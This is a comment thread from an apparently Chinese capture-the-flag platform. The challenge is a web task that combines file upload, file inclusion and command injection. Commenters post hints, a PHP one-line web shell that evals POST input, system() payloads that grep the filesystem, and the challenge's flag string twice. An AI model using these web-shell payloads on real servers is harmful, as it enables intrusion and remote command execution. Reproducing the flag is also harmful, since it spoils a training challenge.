评分(0)
暂无评分
解题动态
puppyo0o0 攻破了该题 6天前
lipton22 攻破了该题 7天前
1833284 攻破了该题 27天前
459286939 攻破了该题 28天前
瓦尔登湖水牛 攻破了该题 1月前
LostDawn 攻破了该题 1月前
nuxe 攻破了该题 1月前
lmufc 攻破了该题 1月前
AioKT 攻破了该题 1月前
zmxyfox 攻破了该题 2月前
15754287188 攻破了该题 2月前
随琉 攻破了该题 2月前
buuble123 攻破了该题 2月前
cafei2022 攻破了该题 2月前
19983578856 攻破了该题 2月前
zhangkewei 攻破了该题 3月前
花舞Flower 攻破了该题 4月前
kaiyafanfan123 攻破了该题 4月前
wywitkey 攻破了该题 4月前
评论
wywitkey 4月前
举报
3.上传一句话图片马,再用read.php?filename=读取你上传的文件,找到flag(一句话木马必须是system命令,这样在读取文件时才能执行),本题的flag在环境变量里,真是没想到.....
wywitkey 4月前
举报
1.看页面代码有提示:read.php?filename=;2.根据伪协议读取index.php代码及read.php代码,找到上传文件的过滤规则(上传文件不能有“php”,read不能有“flag”,上传的文件会被重新命名);
wywitkey 4月前
举报
前面的这几位没有一个说的靠谱,这不是单纯的upload题,还考了文件包含和命令注入 新手去看wp吧,2金币花得值。
ljt1016 6月前
举报
为什么这道题一句话木马上传成功后,无法用蚁剑连接,用正确的方法去访问上传的php文件,只会回显php的内容(即一句话木马)求师傅回答
silentiron 1年前
举报
0xGame{upl0ad_f1le_causes_danger!!!}
zhaiye 1年前
举报
0xGame{upl0ad_f1le_causes_danger!!!}
2728462336 1年前
举报
文件上传加文件包含,上传图片码内容为<?=eval($_POST[123]);?>,文件包含连接shell即可
倦鸟叫了一整天 9月前
举报
@206297162 连接上传的文件
206297162 1年前
举报
大佬改如何连接
不会编程的崽 1年前
举报
<?=system('grep -r "0xGame" / ')> <?=system('cat path')>